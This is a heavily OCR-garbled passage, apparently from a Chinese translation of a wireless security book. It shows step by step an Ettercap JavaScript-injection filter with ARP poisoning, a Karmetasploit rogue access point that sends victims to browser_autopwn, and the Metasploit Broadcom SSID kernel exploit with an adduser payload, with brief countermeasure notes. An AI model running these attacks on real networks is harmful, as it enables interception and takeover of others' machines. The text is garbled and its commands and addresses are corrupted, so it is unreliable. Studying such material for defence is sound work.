onload=\"Javascript:document.location.href=" 
http://10.0.1.9/dbclick.html'\"><XSS a=").; 


msg ("Filter executed .\n"™):; 


| 


过 滤器 的 第 二 部 分 寻找 返回 的 HTML 中 的 <body> 标 签 。 它 用 一 个 <body> 标 签 代 蔡 这 些 标签 ，<body> 标 签 包 全 一 个 
wn (onload) ， 该 事件 将 重 定向 浏览 器 。 在 前 面 的 脚本 中 ， 只 要 操 击 正确 的 服务 器 ， 任 何 路 径 都 是 有 效 的 ， 因 
为 http_capture 模 块 会 抓 住 它 并 咱 应。 你 可 以 用 另 一 个 无 害 的 文件 名 蔡 换 dbclick.html。 


然而 ， 在 Ettercap 可 以 利用 此 过 滤器 之 前 ,我 们 需要 对 它 进行 编译 : 


[~]# etterfilter ./javascript inject.etter 
etterfiilter NG-0.7.3 copyright 2001-2004 ALOR & NaGA 


= 


下 面 的 命令 将 Ettercap 重 定向 到 10.0.1.1 (默认 路 由 器 ) 和 其 他 人 之 间 的 所 有 通信 数据 包 。 此 命令 首先 将 同 我 们 友 送 所 有 打 
算 用 于 因特网 的 通信 数据 包 。 一 旦 我 们 得 到 了 它 ，Ettercap 要 么 未 修改 就 转 友 ， 要 么 通过 我 们 的 过 滤器 运行 HTTP 通 信 。 


[~]# ettercap -T ~M arp:remote /10.0.1.1/ // -FE ./ettercap filters/filter.ef 
一 工 wlanl 


提示 当 在 一 个 基于 mac80211 的 系统 上 使 用 Ettetcap 时 ， 务 必 指 定 接口 。 


在 几 个 来 自 Ettercap 的 “执行 过 滤器 ”信息 之 后 ， 我 们 应 该 得 到 一 些 到 Metasploit 里 的 http_redirect 模 块 的 请 求 : 


之 后 不 久 ，msfconsole 里 的 信息 表明 我 们 有 来 访 者 : 


[*] HTEE REOQUEST 10.0.1.104 3 10.0.1.9:80 GET /dbclick.html Windows EF 


如 果 你 看 不 到 Ettercap 过 滤器 消息 和 Metasploit 汤 洞 利用 攻击 尝试 之 间 的 紧密 通信 ， 不 要 担心 。Ettercap 过 滤器 是 一 个 迟 鲁 
的 工具 。 许 多 蔡 代 工具 实际 上 不 会 导 狼 浏览 器 重 定向 。 然 而 在 访问 一 些 网 页 后 ，JavaScript 的 有 效 载 从 将 登录 ， 你 的 客户 将 重 定 
器。 


人 @ARP 其 蝙 的 应 对 措施 


实际 上 有 多 种 方法 可 以 防止 受到 ARP 和 欺骗 攻击 。 一 种 是 设置 一 个 静态 ARP 入 口 。 当 我 们 参加 黑客 大 会 的 上 时候， 这 种 技术 经 党 
会 做 推荐 。 另 一 种 是 利用 VPN 技 术 。 


幸运 的 是 ，arp 命 令 企 Windows、Linux 和 OS X 上 是 类 似 的 。 在 所 有 这 些 平台 上 ， 可 以 使 用 arp-a 查 看 ARP 表 ， 可 以 通过 输 
入 arp-s 设 置 一 个 静态 ARP 入 口 。 下 面 的 示例 向 你 演示 如 何 查询 ARP 表 ， 并 输入 一 个 静态 设置 : 


arp -a 


i 一 门 


(192.168.2.1) at 00:16:Pp6:163:a0U:co on enl [ethernet | 


在 这 种 情况 下 ， 假 设 192.168.2.1 是 默认 网 天 ， 并 且 你 没 怀疑 它 目 前 已 被 别人 破坏 。 为 了 使 这 个 ARP 入 口 是 静 人 态 的 并 防止 
ARP 中 毒 攻 击 ， 你 可 以 输入 以 下 内 容 : 
sudo arp -3 197.168.2.1 00:16:bo:16:a0:co 
arp -a 


i 二 站 二 方 


(192.168.2.1) at 0:16:b6:l16:au:co on enl permanent [ethernet | 


提示 ”在 Windows 上 ， 使 用 afp 命令 时 用 破 折 号 而 不 是 冒号 指定 MAC 地 址 。 


当然 ， 来 手 的 方面 是 确定 你 应 该 用 ARP 入 口 做 什么 。 当 处 理 802.11 时 ， 你 的 ARP 入 口 常常 或 一 次 性 地 等 于 网 络 的 BSSID。 在 
以 太 网 上 ， 入 口 可 以 是 任何 东西 。 不 需要 天 于 真正 的 上 洲 路 由 器 的 先 验 知识 ， 你 能 做 得 最 好 的 事情 是 连接 、 检 查 入 口 并 使 其 静 
人 态 。 当 你 这 么 做 的 时 候 ， 你 假设 你 最 初 没有 受到 ARP 中 毒 攻击 。 


5.4 ”使 用 Karmetasploit 动 态 生 成 所 去 接 入 点 和 洒 意 服务 器 


2004 年 ，Dino Dai Zovi 和 和 Shane Macaulay (K2) 提出 了 一 个 革命 性 的 工具 ， 称 为 KARMA。 该 工具 旨 在 引诱 客户 峭 进 入 
攻击 者 的 接 入 点 和 受到 操纵 的 网 络 环境 中 。 在 此 工具 之 前 ， 如 果 你 想 引诱 客户 端 访问 一 个 恶意 的 接 入 点 ， 您 只 需 将 SSID 设 置 成 
基 些 比较 有 诱惑 力 的 名 称 ， 并 希望 用 户 手 动 连接 到 你 的 网 络 。Dino 和 Shane 意 识 到 这 种 方法 是 非常 低 效 的 ， 因 为 客户 端 在 Probe 
Request (探测 请 求 ) 数据 包 中 广播 他 们 想 连 接 的 SS1ID。 所 有 你 需要 做 的 束 是 动态 设置 基于 这 些 探测 的 SSID， 你 将 满足 客户 寻 


找 要 加 入 网 络 的 最 大 标准 。 他 们 实施 的 这 种 攻击 称 为 KARMA。 


复杂 的 问题 是 在 模拟 网 络 上 使 用 加 密 和 认证 。 由 于 KARMA 引 诱 客 户 端 进入 攻击 者 所 建立 的 有 悉 意 AP 环境 ， 因 此 它 需 要 满足 客 
户 的 要 求 。 这 举 要 求 已 经 随 痢 时 间 的 推移 而 改变 ， 因 为 操作 系统 供应 商 意识 到 了 安全 漏洞 ， 并 同上 自己 的 客户 介绍 。 


Dino 和 Shane 指 出 ， 在 Windows XP SP2 和 以 前 的 系统 下 ， 如 何 处 理 无 线 网 络 的 一 个 致命 的 缺陷 : 操作 系统 将 接受 一 个 带 
KARMA 的 网 络 模 拟 ， 而 不 管 客户 端的 加 密 和 身份 验证 设置 。 举 例 来 蜗 ， 如 果 Windows XP SP2 系 统 有 一 个 需要 WPA2/CCMP 加 
密 和 PEAP 验 证 的 SSID 为 “corpnet”， 那 么 攻击 者 可 以 通过 创建 一 个 带 SSID“corpnet” 的 开放 网 络 来 模拟 系统 。 只 要 攻击 者 
使 用 的 SSID 和 客户 端 上 配置 的 SSID 相 匹配 ，Windows XP SP2 系 统 就 会 当做 一 个 合法 的 网 络 愉快 地 接受 KARMA 的 广告 。 


这 种 行为 在 Windows XP SP3、Windows Vista 和 Windows 7 上 有 所 改变 。 在 Windows XP SP3 和 更 高 版 本 中 ， 客 户 端 需 
要 为 它 要 漫游 网 络 设置 加 密 和 身份 验证 ， 来 匹配 本 地 配置 的 选项 。 这 种 新 行为 与 OS X 的 设备 相 匹 配 ， 为 了 使 加 密 网 络 有 效 地 击 
败 KARMA 攻 击 ， 加 密 网 络 里 的 密 钥 是 未 知 的 。 不 过 ， 如 果 一 个 开放 网 络 在 它们 的 首选 网 络 列表 中 (考虑 你 曾经 连接 
PANERA 或 免费 公共 WiFi 上 的 组 织 中 的 用 户 数量 ) ， 那 么 Windows XP SP3 和 更 高 版 本 以 及 OS X 客 户 端 仍然 容易 受 
攻击 。KARMA 将 模拟 此 网 络 ， 并 恰 快 地 接受 你 的 客户 融 ， 他 们 认为 这 个 网 络 是 突然 可 以 利用 的 。 


Jattwifi、 
KARMA 人 的 


HH 


HH 


复杂 的 地 方 存在 于 XP 客 户 端 和 第 三 方 无 线 堆 栈 的 行为 。 在 Windows XP 系统 上 ， 如 果 驱 动 器 制造 商 希 望 添加 额外 的 功能 到 
无 绕 堆 材 里 ， 那 么 他 们 不 得 不 更 换 目 己 的 无 线 零 配置 (Wireless Zero Configuration，WZC) Windows XP 的 本 地 无 线 堆栈 ， 
这 样 产 生 了 许多 来 自 Cisco、lntel、Atheros、Broadcom、Linksys、Belkin 的 更 多 的 第 三 方 无 线 堆栈 。 通 过 强制 执行 所 希望 的 
首选 网 络 入 口 加 密 设置 ，Windows XP SP3 和 更 高 版 本 的 系统 击败 了 KARMA 攻 击 ， 但 是 每 个 第 三 方 扒 栈 的 行为 都 是 慎重 的 ， 留 
下 许多 尽管 使 用 了 补丁 和 最 新 的 Windows XP 系统 但 还 是 易 受到 攻击 的 设备 。 


XP 机 项 使 和 随机 的 SSID 


长 时 间 盯 住 802.11 数 据 包 ， 你 会 最 终 看 到 一 个 客户 端 发 出 一 个 看 似 随 意 的 SSID 的 探测 请 求 。 当 用 户 的 首选 网 络 都 不 在 范围 内 
时 ，Windows XP SP2 和 以 前 的 版 本 将 网 卡 置 于 Patrked 模 式 。Windows XP 这 样 做 的 原因 很 可 能 因为 不 是 为 了 降低 网 卡 的 功率 和 定期 
重新 初始 化 它 来 执行 后 台 扫 描 ， 而 是 把 SSID 设 置 成 不 太 可 能 在 该 地 区 的 事物 只 是 更 容易 些 。 


当然 ， 当 这 些 “ 休 眼 ” 网 络 中 的 某 一 个 实施 探测 时 ， 使 用 KARMA 做 出 回复 是 容易 的 ， 但 这 会 使 Windows XP SP2 的 机 顶 盒 身 
处 很 大 的 风险 中 ， 更 有 趣 的 是 ， 如 果 区 ARMA 成 功 地 诱骗 了 一 个 “休眠 ”状态 的 Windows XP SP2 机 顶 盒 ， 则 操作 系统 即使 没有 成 
功 连 接 ， 也 会 显示 出 接口 状态 。 这 时 你 不 仅 坎 骗 了 本 来 就 毫 不 怀疑 的 客户 ， 而 且 如 果 该 客户 端 愿意 不 嫌 麻 烦 地 检查 网 络 状 态 ， 它 
会 呈现 出 掉 线 的 状态 。 


唯一 使 这 些 “ 体 眠 ”的 客户 端 还 算 不 那么 不 堪 一 击 的 是 ， 在 进入 休眠 模式 之 前 ， 这 些 处 于 “休眠 ”模式 的 SSID 加 密 算法 的 
设置 ， 都 是 从 所 探测 的 网 络 中 继承 过 来 的 。 如 果 客 户 端 在 进入 到 “休眠 ”模式 之 前 正在 访问 “SecuteCotrpNet 网 站 ， 那 么 你 需 
要 知道 加 密 设置 (包括 密 钥 ) 才能 继续 更 多 的 操作 。 当 休眠 之 后 ， 如 果 客 户 端 正在 控 测 “Free Public Wif 网 络 ”或 “linksys 网 
站 ， 你 可 能 根本 就 不 需要 考虑 加 密 算 法 的 设置 。 


KARMA 的 最 初 实现 包括 一 个 madwifi 驱 动 程序 的 补丁 。 不 笠 的 是 ， 此 补丁 程序 难以 维护 ， 因 为 在 Linux 无 线 驱动 程序 中 不 断 
大 量 地 粗 制 小 造 。 后 来 madwifi 补 丁 程序 被 废弃 ， 因 为 hirte (一 个 Aircrack-ng 开 发 人 员 ) 以 airbase-ng 的 形式 实施 了 一 个 更 好 
的 解决 方案 。 然 后 ， 将 KARMA 打 包 的 恶意 服务 器 连接 到 Metasploit。 这 个 airbase-ng 和 Metasploit 客 户 端 攻 击 工具 的 结合 就 是 
通 弟 所 说 的 Karmetasploit。 


airbase-ng 是 一 个 用 户 级 工具 ， 它 使 用 监控 模式 和 注入 来 寻找 客 尸 端 友 出 的 Probe Request (探测 请 求 ) 数据 包 ， 然 后 友 送 
Beacons ( 信 标 ) ， 使 它 看 起 来 好 像 是 在 汽 围 内 被 探测 的 AP。 一 旦 客 尸 端 与 我 们 的 用 尸 级 AP 发 生 联系 ,我 们 丈 完 全 控制 了 他 的 
通信 。 此 时 ， 每 当 客 户 痊 司 动 一 个 Web 浏 览 器 、 电 子 邮件 客户 痛 或 诸如 此 类 ， 他 融会 疏 定 向 到 一 个 Metasploit 上 实施 的 恶意 服 


务 器 。 


在 我 们 以 airbase-ng 开 始 之 前 ， 我 们 需要 稍微 重组 我 们 的 网 络 。 在 上 一 证 中 ， 我 们 只 是 一 个 客户 端 ， 连 接 到 10.0.1.x 子 网 上 
的 网 络 上 。 在 本 节 中 ， 我 们 要 改变 它 。 从 这 点 出 发 ， 我 们 要 在 192.168.1.X 子 网 上 创建 我 们 自己 的 网 络 与 自己 的 默认 网 关 ， 如 下 
图 所 示 。 下 面 的 例子 中 使 用 的 dhcpd.conf 和 KARMA.rc 文 件 可 以 在 书 中 的 配套 网 站 找到 。 


攻击 音 


alrbase-ng - mond 
192.168.1.1 - at0 


]c's airport d-link 
py 避 


@ “airbase-ng 产 生 的 恶意 的 AP 


Co 


我 们 需要 做 的 第 一 件 事情 是 下 载 并 安 丢 airbase-ng: 


Is woet http://download.aircrack-ng. org/aircrack-—ng——l1.0.tar.gz 
I$ tar ~zxf aircrack-ng—l1 .0 .tar.dyez 

~|$ cd aircrack-ng—l1.0 
/aircrack-ng-1.0|1$ make && sudo make install 


提示 “关于 Aitctack-ng 和 aiftbase-ng 工 具 的 更 高 版 本 ， 务 必 检 查 aifcfack-ng.otg 网 站 。 
8 8 8 OIL8 


半 B 


运行 安装 后 ，Aircrack-ng 套 件 (由 许多 单独 的 二 进 制 文件 组 成 ) 将 位 于 /usr/local/bin 中 。airbase-ng 是 此 套件 的 一 部 分 


root@phoenix:~/aircrack-ng—l10-rc3]$ 1s /usr/l]ocal/sbin 


airbase-ng airdriver-ng ailireplavy-ng alirmon-—ng Aalirodump-ng alirserv—ng 


dlrtun—ng 
现在 我 们 需要 配置 我 们 的 无 线 接口 ， 然 后 启动 airbase-ng。 首 先 ， 让 我 们 的 无 线 接口 进入 监控 模式 : 


[~/]# airmon-ng start wlanl 


Interface Chipset DIiver 
wlanl Atheros athok 一 [phy3] 
(monitor mode enabled on mon0) 


现在 我 们 局 动 airbase-ng 来 动态 创建 客户 正在 寻找 的 Beacon ( 信 标 ) 数据 包 。airbase-ng 动 态 啊 应 Probe Requests (探测 
请 求 ) (-P) 并 用 60 秒 (-C 60) 为 所 探测 的 SSID 设 置信 标 。 接 下 来 的 参数 是 静 仿 的 SSID 广 播 ， 以 及 监控 模式 接口 。 


~/]# airbase-ng -P -C 30 -e "Free Wifi" -vy mon0 

15:33:16 Created tap interftace ato0 

123:33:16 Trying to set MIU on at0) to 1200 

12:33:16 Access Point with BSSID 00:12:1/1: /19:1]C:BO started. 


提示 airtbase-ng 包 含 许多 额外 的 功能 ， 检 查 手 册页 的 命令 行 选项 。 


airbase-ng 通 过 创建 一 个 虚拟 的 Linux TUNVTAP 接 口 进 行 工 作 ， 默 认为 at0。 这 个 授 口上 运行 的 程序 将 数据 传送 到 airbase- 
ng， 然 后 airbase-ng 将 数据 友 送 到 所 有 相 天 的 客户 亲 。 让 airbase-ng 运 行 ， 并 在 另 一 个 终 疹 配置 at0: 


[~]# ifconfiqg at0 192.168.1.1 netmask 255.255.2595.0 


[~]# dhcpd3 -cf /etc/dhcp3/ché-—-dhcpd-l192x.conf ~—d at0 
Internet Systems Consortium DHCP Server V3.1.1 
CopyIright 2004-2008 Internet Systems Consortium. 


Listening on LPF/atO0/00:12:17:79:1c:b0/192.168.1/24 


我 们 现在 有 一 个 DHCP 服 务 器 正在 监听 airbase-ng 的 tap 接 口 。 所 有 我 们 需要 做 的 是 在 一 个 配置 里 重新 运行 Metasploit， 该 
配置 类 似 于 我 们 在 本 章 前 面 进行 的 设置 。 这 一 次 ,我们 只 是 可 以 从 一 个 文本 文件 中 加 载 所 有 命令 ， 而 不 是 输入 它们 。 这 个 文件 在 
书 的 配套 网 站 (http://www.hackingexposedwireless.com) 上 。 


./:m3fconsole 一 工 ./ché-—-karma—l92?x.rc 


提示 “例子 中 的 DHCP 和 KARMA 配 置 文件 也 在 这 本 书 的 配套 网 站 上 。 


如 果 任 何 无 线 客 户 端 都 在 沁 围 之 内 ， 那 么 在 我 们 开始 从 airbase-ng 得 到 类 似 以 下 输出 之 前 ， 我 们 不 需要 等 大 久 。 


163:40:2U Got directed probe Teduest from 00:22:95F:41:4F:33 - "d-link" 
16:40:20 Got an auth request from O00:22:5F:47:4F:953 (open system) 
16:40:20 Client O00:22:5F:47:4F:53 associated (unencrypted) to ESSID: "d-link"™ 


在 此 之 后 不 久 ， 我 们 将 看 到 DHCP 服 务 器 分 配 一 个 IP 地址 : 
DHCPDISCOVER from O00:22:50f:41:4f:03 Via at0 
DHCPOFEFER on 192:168;1 ;100 to U0:2250f:4171:4df:53 (Iohnvycsh~HPWINI) via at0 


然后 ， 当 用 户 尝 试 随时 随地 浏览 时 ，Metasploit 开 始 行动 ， 利 用 相同 的 fakedns 工 具 ， 然 后 是 http_capture 工 具 ， 青 后 是 
browser autopwn 工 具 ， 如 本 章 5.1 节 所 讲 的 那样 操作 。 


.9 escape() Return Value Memory Corruption 


天 于 使 用 airbase-ng 来 处 理 动态 恶意 AP 产 物 的 很 酷 的 事情 是 : 一 旦 它 得 到 一 个 用 户 关 联 ， 那 么 通过 使 用 它 提 供 的 tap 接 口 
(通常 at0) 我 们 就 可 以 把 该 客户 端 视 为 已 经 在 本 地 的 以 太 网 连接 上 。 请 注意 ， 当 在 有 线 接 口 或 airbase-ng 创 建 的 接口 上 运行 
时 ，Metasploit 内 部 使 用 的 模块 不 需要 改变 ， 这 意味 着 其 他 传统 的 MITM 攻 击 ， 比 如 
Middler (http://code.google.com/p/middler/) 或 IPPON ( 涵 茵 在 5.5.3 节 中 ) ， 也 起 作用 。 


图 防御 动态 生成 的 恶意 Ap 


保护 目 己 不 受 恶意 AP 攻击 的 最 简单 的 万 法 是 决 不 连接 到 一 个 开放 的 接 入 点 。 这 样 做 ， 你 会 避免 在 Preferred Networks ( 首 
选 网 络 ) 列表 里 存储 一 个 开放 的 AP， 这 意味 着 运行 airbase-ng 的 人 难 有 时 | 间 引 诱 你 连接 。 不 幸 的 是 ， 对 于 大 多 数 人 来 说， 这 是 
不 现实 的 。 一 个 简单 的 应 对 措施 是 要 始终 使 用 静态 的 DNS 服务 器 。 静 态 DNS3 服 务 器 不 会 阻止 一 个 坚定 的 黑客 (他 可 以 调整 网 络 
来 匹配 你 的 DNS 请 求 ) ， 但 它 将 阻止 Metasploit fakedns 模 块 的 攻击 直到 他 这 么 做 ， 这 有 可 能 让 你 伐 盏 脱险 。 


由 于 Windows Vista 和 Windows 7 中 包含 的 更 精怪 的 客户 端 探 测 行 为 ， 因 此 升级 到 任何 一 个 也 有 助 于 减少 这 种 风险 。 此 
外 ，Windows XP 上 的 第 三 方 无 线 堆 栈 比 后 来 的 Microsoft 扒 枝 可 能 对 此 更 易 受 攻击 ， 因 此 ， 如 果 可 能 的 话 ， 你 可 能 想 使 用 
Windows Vista。 


以 前 的 客户 叫 攻击 利用 我 所 说 的 全 谐 协议 推 村 操作 。 虽 然 这 肯定 是 有 效 的 ， 但 有 时 你 渴望 更 隐形 一 点 儿 。 下 面 的 客户 闯 攻 击 
目标 是 通过 绕 过 许多 中 间 层 获得 客 尸 端 上 的 执行 代码 。 


5.5 “客户 病 的 直接 注入 近 术 


以 有 前 的 Karmetasploit 技 术 的 惯用 做 法 包括 让 客户 辛 主动 和 你 发 生 某 种 关联 (尽管 最 终 用 户 可 能 没有 意识 到 这 一 点 ) 。 而 现 
在 的 做 法 不 再 是 尝试 使 一 个 客户 端 漫游 到 了 网络， 而 只 是 直接 向 客户 端 注入 数据 包 ， 就 像 他 们 直接 来 自 AP， 这 种 实现 方式 会 变 得 
更 容易 。 本 节 涵 盖 了 两 类 这 样 的 工具 。 


当 你 这 么 做 的 时 候 ， 是 在 欺骗 客户 端 接 受 你 注入 的 数据 包 ， 而 不 是 欺骗 客户 端 主 动 与 你 友 生 某 种 关联， 建立 连接 。 至 于 客户 
端 而 言 ， 你 传输 的 数据 包 来 自 合法 的 AP。 这 些 直接 数据 注入 技术 的 潜力 是 非常 隐蔽 的 ， 因 为 它们 可 以 不 友 送 包含 任何 错误 的 
Management (管理 ) 帧 ， 所 以 WIDS 服 务 器 只 用 短暂 的 时 间 就 可 以 检测 完毕 。 


5.6 ”设备 驱动 程序 漏洞 


设备 驱动 程序 漏洞 是 无 线 网 络 安全 中 最 有 趣 的 友 展 之 一 。 这 些 漏洞 是 独一无二 的 ， 因 为 即使 它们 被 捆绑 到 一 个 特定 的 协议 
(例如 802.11 或 蓝牙 ) ， 它 们 也 不 是 与 协议 设计 相关 的 问题 。 相 反 ， 它 们 是 与 该 协议 实施 相关 的 问题 。 


一 般 情况 下 ， 许 多 不 同类 型 的 设备 驱动 程序 可 能 是 易 受 攻击 的 。 一 个 USB 设 备 驱 动 程序 可 能 无 法 处 理 通 过 政 方 设备 传 给 它 的 
数据 ， 政 方 设备 故意 违反 标准 。 事 实 上 ， 这 样 的 攻击 在 不 久 前 是 起 作用 的 。 这 种 攻击 没有 让 太 多 人 感到 紧张 ， 因 为 它 需要 物理 访 
问 设备 。 


无 线 改 变 了 这 一 切 ， 第 一 个 公开 发 现 的 、 可 被 攻击 的 远程 无 线 设备 驱动 程序 实际 上 出 现在 FreeBSD 中 ， 它 是 由 Karl Janmar 
在 2006 年 友 现 。 出 于 某 种 原因 ， 这 个 bug 被 普遍 忽视 。 后 来 ， 远 程 利用 bug 在 Intel 公 司 流行 的 Centrino 系 列 上 ， 以 及 在 Apple 公 
司 的 Broadcom 和 基于 Atheros 的 驱动 程序 上 也 陆续 故 现 。 一 个 非常 流行 的 监 牙 堆栈 也 在 随后 发 现 可 以 利用 的 漏洞 。 


无 线 设 备 驱 动 程序 漏洞 与 大 多 数 人 习惯 处 理 的 漏洞 有 很 大 的 不 同 ， 大 多 数 的 漏洞 是 在 应 用 程序 中 而 不 是 协议 栈 中 友 现 。 应 用 
程序 位 于 OSI 网 络 模型 的 第 七 层 ， 一 般 在 TCP 和 1IP 协 议 的 上 面 。 而 设备 驱动 程序 处 理 的 是 数据 链 路 层 (第 二 层 ) 的 数据 包 ， 这 将 
导致 以 下 几 个 后 果 。 


第 一 个 后 果 是 ， 为 了 利用 易 受 攻击 的 无 线 设 备 驱动 程序 ， 攻 击 者 需要 在 目标 的 无 绪 功 率 履 兰 学 围 内 。 你 不 能 在 因特网 上 远程 
利用 一 个 易 受 攻击 的 无 线 驱 动 程序 。 


第 二 个 大 的 后 果 是 ， 攻 击 者 获取 内 核 (aka 的 ring0) 执行 代码 。 虽 然 这 是 天 生 有 吸引 力 的 (无线 驱 动 程序 出 现 之 前 ， 远 程 
ring0 代 码 执行 bug 极 为 罕见 ) ， 但 这 也 给 攻击 者 提出 一 些 问题 。 很 少 有 人 知道 什么 样 的 代码 在 内 核 中 运行 。 直 到 最 近 ， 极 少数 
使 用 剪 切 和 粘贴 的 功能 而 获得 的 有 效 载荷 可 利用 它 。Metasploit 3.0 改 变 了 这 一 切 ， 提 供 了 一 个 令 人 印象 深刻 的 
ring0“stager”， 即 使 你 在 内 核 中 开始 ， 也 让 你 以 root 身 份 执行 用 户 级 (userland) 的 有 效 载 集 。 下 面 是 一 个 关于 如 何 使 用 这 
个 强大 工具 的 详细 例子 。 


© ope 3.0 友 起 无 线 攻 击 


流行 
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抽象 地 谈论 驱动 程序 攻击 已 经 够 多 了 。 让 我 们 继续 前 进 ， 并 运行 一 个 。 不 幸 的 是 ， 所 有 公开 发 布 的 设备 驱动 程序 攻击 目前 有 
点 过 时 了 。 为 了 测试 一 个 802.11 驱 动 程序 攻击 ， 你 需要 找到 一 个 旧 的 易 受 攻击 的 驱动 程序 。 在 这 个 例子 中 ， 我 们 使 用 一 个 旧 的 
Broadcom 了 驱动 程序 。 尽 管 此 攻击 已 过 时 ， 但 运行 较 新 程序 的 一 般 过 程 应 该 是 非常 相似 的 。 


J 


为 什么 无 线 攻击 失去 活力 


几乎 每 一 个 产品 的 无 线 驱动 程序 中 ， 都 发 现 了 可 攻击 的 bug (到 目前 为 止 超过 14 个 CVE ID) , 但 经 过 一 段 紧张 的 时 期 之 后 ， 
关于 驱动 程序 的 bug， 逐 渐 由 洪流 减缓 成 溪流 。 当 然 ， 其 中 原因 部 分 是 由 于 独立 的 驱动 程序 作者 修正 了 他 们 的 代码 ， 但 这 不 是 全 
部 。 另 一 个 重要 方面 是 ，Windows Vista 重 新 构造 无 线 协 议 栈 ， 它 把 帧 解析 的 许多 重担 放 在 了 Mictosoft 提 供 的 代码 上 ， 而 不 是 每 个 
的 驱动 程序 作者 身上 。 这 种 变化 的 好 处 是 命名 许多 可 被 攻击 利用 的 代码 路 径 ， 根 本 就 无 法 在 Windows Vista 和 更 高 的 平台 上 使 用 。 
当然 ， 缺 点 是 ， 如 果 有 人 在 Vista 中 的 Mictosoft 帧 处 理 代 码 中 找到 一 个 漏洞 ， 那 么 不 管 是 什么 驱动 程序 ， 它 都 将 影响 所 有 的 802.11 
网 卡 。 虽 然 架构 变化 肯定 减少 整体 上 的 安全 漏洞 数量 (以 及 清理 杂乱 的 802.11 栈 ) ， 但 这 也 意味 着 Mictosoft 代 码 中 的 个 别 bug 将 影 
响 整 个 市 场 。 虽 然 在 Microsoft 的 802.11 内 核 代 码 中 尚未 有 任何 公开 发 现 的 bug， 但 在 MS09-049 中 有 关于 封闭 调用 的 描述 。 


ri 


MS09-049 安 全 公告 描述 了 Mictosoft 的 无 线 局 域 网 服务 中 的 一 个 漏洞 : wlansvc。 由 于 wlansvc 在 用 户 级 别 运 行 ， 此 这 个 漏洞 
不 是 一 个 设备 驱动 程序 漏洞 ， 它 是 用 户 级 代码 中 的 一 个 漏洞 ， 处 理 低级 别 的 802.11 数 据 包 。 如 果 曾 经 写 过 利用 此 漏洞 的 攻击 ， 那 


么 利用 它 将 需要 本 节 中 涵盖 的 所 有 相同 数据 包 注 入 技术 。 

在 本 节 中 ， 我 们 将 假定 你 有 一 个 Metasploit 子 版 本 树 ， 连 同 ruby-loron 和 pcaprub 的 最 新 副本 。 如 果 没 有 ， 请 按照 本 章 开 
头 所 述 的 指示 得 到 一 份 。 我 们 也 将 假设 你 有 一 个 监控 模式 接口 ， 运 行 在 接口 mon0 上 的 mac80211 驱 动 程序 上 上。 如果 你 没有 设 
置 ， 那 么 只 需 使 用 airmon-ng 来 创建 一 个 。 你 将 需要 以 root 身 份 启 动 msfconsole 执 行 数 据 包 注 入 : 


我 们 将 演示 的 攻击 是 Broadcom SSID 缓 冲 区 溢出 ， 有 一 个 Metasploit 模 块 来 攻击 它 : 


™ 本 ee T 3 rs s T [as | Pm i 机 Fa 站 7 | a 下 有 过 “本 Pm 
msf > use windows/driver/broadcom wifi ssid 


现在 ， 你 需要 配置 攻击 的 选项 : 


msf exploit (broadcom wifi ssid) > set INTERFACE mon0 
"站 


msf exploit (broadcom WILL 331id})} > set DRIVER mac80211 


msft exploit (broadcom wifi 3s33id} > set CHANMNNEL 1 


现在 ， 你 需要 的 是 一 个 目标 : 


ms exploit(broadcom wifi s31d) > show targets 
Id Name 


0 Windows XE SE2 {0 L2000 21122 BemLy sv 33.00.21: 1 
| Windows XP SP2 {0.1 .2000.2180}, bcmwloy.sys 3.050.21].10 
我 们 测试 使 用 的 本 地 计算 机 安 濠 有 3.50.21.10 版 本 的 驱动 程序 。 我 们 也 碰巧 知道 安 涂 的 ntoskrnl 版 本 和 target 0 相 匹 配 的 。 


目前 ， 内 核 攻击 的 最 大 缺点 是 需要 了 解 有 关 目 标的 详细 信息 。Metasploit 在 工作 中 很 难 使 ring0 的 有 效 载 倚 对 类 似 这 样 的 事 
情 不 敏 感 ， 但 现在 ， 它 有 助 于 了 解 受 害 者 机 器 上 的 ntoskrnl.exe 版 本 。 你 可 以 在 ci:\windows\system32\ntoskrnl.exe 文 件 的 File 


Properties 中 看 到 它 。 


选择 与 受害 者 最 匹配 的 目标 。 请 记 住 ， 如 果 攻 击 不 起 作用 ， 那 么 将 出 现 赣 屏 错误 界面 ， 所 以 谨 愤 选择 。 


msf exploit (broadcom wifi ssid) 


最 后 做 的 一 件 事情 是 填写 有 效 载荷 和 受害 者 的 MAC 地 址 。 

为 了 演示 的 目的 ，Windows/adduser 有 效 载荷 是 一 个 不 错 的 选择 。 使 用 大 多 数 无 线 攻击 ， 得 到 一 个 实时 的 反 向 连接 shel 程 
序 是 不 可 能 的 ， 因 为 你 最 终 攻击 你 使 用 的 无 线 驱 动 程序 。 当 前 这 种 情况 的 特例 似乎 是 windows/driver/dlink_wifi_rates 攻 击 ， 它 
实际 上 已 经 给 了 我 们 攻击 后 的 网 络 连接 : 


msf exploit (broadcom wifi ssid) 
msf exploit (broadcom wifi ssid} > set USER metasploit 
Im dl) 


sf exploit (broadcom wifi ss 


最 后 ， 你 只 需 设置 目标 的 MAC 地 址 。 在 这 种 情况 下 ， 地 址 是 00:14:a5:06:8f:e6。 这 个 地 址 显然 对 你 来 说 是 不 同 的 。 


msft exploit (broadcom WILL ssid) > set ADDR DST 0U0:T4:a5:06:81:e6 


最 后 做 的 一 件 事情 是 进行 攻击 。 


警告 ”在 调试 时 已 经 反复 对 这 个 漏洞 验证 测试 了 几 十 遍 ， 所 出 现 过 的 最 粳 糕 的 事情 就 是 使 整个 对 话 框 蓝屏 ， 只 有 一 次 除外 ， 
当时 一 个 路 过 的 alpha 粒 子 决定 摘 乱 我 的 日 子 ， 当 试图 运行 aaduset 有 效 载荷 时 完全 破坏 了 我 妻子 的 计算 机 注册 表 。 永 远 不 要 忘记 你 
正在 试图 做 什么 : 在 运行 的 内 核 里 面 执 行 任意 代码 。 事 情 都 可 能 出 错 ! 不 要 尝试 用 你 一 生 的 工作 对 一 个 对 话 框 这 样 做 ， 事 先 要 备 


份 注册 表 ， 这 是 一 个 好 主意 。 
如 果 大 的 警告 没有 使 你 感到 大 烦 ， 那 么 通过 你 的 手指 键入 攻击 操作 : 


m3ft exploit (broadcom wifi ssid) > exploit 
n 


[*] Sending beacons and 


这 个 特殊 漏洞 的 工作 方式 是 通过 对 受害 者 发 送 上 畸形 的 信 标 和 探测 回复 。 即 使 没有 用 户 点 击 Refresh Network List (刷新 网 络 
列表 ) 按钮 ，Windows 仍 然 周 期 性 地 ， 通 常 大 约 每 分 钟 一 次 ( 即 默 认 60 秒 的 运行 时 间 ) 寻找 网 络 。 这 意味 着 ， 即 使 受害 者 不 同 
